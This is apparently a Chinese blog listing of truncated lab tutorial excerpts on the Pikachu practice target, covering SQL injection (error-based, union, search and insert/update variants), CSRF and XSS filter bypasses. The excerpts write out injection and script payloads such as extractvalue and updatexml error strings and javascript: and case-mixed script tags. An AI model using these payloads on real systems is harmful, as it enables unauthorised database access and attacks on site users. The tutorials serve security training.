SQL注入-基于delete利用案例 在delete界面点击删除,同时使用bp工具进行抓包查看数据 通过抓包查看,id=65为数字型的 将该数据发送到repeater进行编辑输入payload语句进行测试 1 or updatemxl(1,concat(0x7e,database()),0) 将payload语句输入到id=后面,然后选中payload语句进行格式转换 然后点击发送,可以查
SQL注入-基于insert/update利用案例 sql语句正常插入表中的数据 insert into member(username,pw,sex,phonenum,address,email) values('xiaoqiang',1111,1,2,3,4); select * from member; 例如插入小强数据,如图所示: 采用or这个运算符,构造闭合语句 values('xi
注入基于函数报错extractvalue(),floor()-字符型 基于extractvalue() 爆出数据库版本payload语句: kobe' and extractvalue(0,concat(0x7e,version()))# 爆出数据库版本 基于floor() floor()函数就是取整数 爆出数据版本信息 kobe' and (select 2 from (select c
基于函数报错的方式来进行利用-字符型(本页updatexml()) 前提条件是后台数据库没有屏蔽数据库语法报错信息 updatexml()方法详解 注释: 第一个参数,意思就是xml文档的名称 第二个参数,意思就是定位到xml文档中指定的某一个位置的更新 第三个参数,意思就是将文档中指定某一个位置的内容进行替换 基于函数报错的payload语句:updatexml() kobe' and up
通过information_schema拿下数据库案例-字符型 数据库information_schema数据库中存在很多重要信息,包括所有的表名,库名,列名等等 TABLES表名的对应字段信息 COLUMNS对应的字段信息 测试开始,还是用字符型为案例 我进行随意输入一个单引号,进行查询,返回报错sql语句错误等,证明输入的信息被后台执行了 随意输入一个payload语句,发现爆出两个字
通过union进行获取数据-字符型 在pikachu上查询kobe,出现了两个字段id和email 在后台和前端查询是一样的出现数据,也就是有两个字段:id和email 通过sql语句order by 以列的形式排序,没有第三列,所以order by 3 报错 然后在字符型手动测试猜测有几列,可以多次测试看看有多少列。 aaa' order by 3# 如图所示表中没有3列 再来输入一次
SQL注入-xx型 输入kobe查询,同样展示id和邮箱 xx型的sql语句查询方式,猜测 select 字段1,字段2 from 表名 where username=('kobe') 在后台语句中的查询 select id,email from member where username=('kobe'); 根据上图构造payload语句为 username=('kobe') or 1=
SQL注入-搜索型 输入k字段进行搜索发现出用户信息 通过上图搜索可以猜测的sql语句为 select 字段1,字段2 from 表名 where username like '%k%'; 在后台查询结果 select id,email from member where username like '%k%'; 通过以上猜测进行构造payload语句 like '%k%' or 1=1
SQL注入-字符型(get) 输入kobe查询出现id和邮箱 猜测语句,字符在数据库中需要用到单引号或者双引号 select 字段1,字段2 from 表名 where username='kobe'; 在数据库中查询对应的kobe,根据上图对应上。 select id,email from member where username='kobe'; 编写payload语句,添加or 1=
SQL注入-数字型(post) 查询1的时候发现url后面的链接没有传入1的参数。验证为post请求方式,仅显示用户和邮箱 通过图中的显示的字段,我们可以猜测传入数据库里面的语句,例如: select 字段1,字段2 from 表名 where id=1; 编辑一个payload的or 1=1 select 用户名,邮箱 from 表名 where id=1 or 1=1; 然后我们进入pik
1.pikachu界面上的csrf(get)登录 账号:lucy密码:123456 2.修改地址,并且都是bp进行抓包 3.bp上抓包的数据信息 抓包的对应的地址是beijing GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=12345678922&add=beijing&email
'"><sCrIpT>alert(63252)</sCrIpT> 大小写绕过 '"><IFRAME SRC=javascript:alert('XSXSSSs')></IFRAME> <scr<script>ipt>alert("XXSSSS")</scr</
XSS跨站脚本攻击 一、什么是 XSS XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,**XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。** 从
12.xss之js输出 后台源码文件 输出的源码 输入1111之后能看到心中所爱 查看页面代码元素,1111在js中,如图所示: 接下来将这段代码复制出来进行编辑攻击代码 <script> $ms='x'</script><script>alert("Xss")</script>'; if($ms.leng
11.xss之href输出 后台配置文件中的代码 xss之href输出绕过:javascript:alert(1111) 直接代入a标签herf里面一样可以绕过htmlspecialchars 输入攻击代码 javascript:alert(1111) 点击蓝色字体直接会弹窗,如图所示:
Copyright © 2005-2025 51CTO.COM 版权所有 京ICP证060544号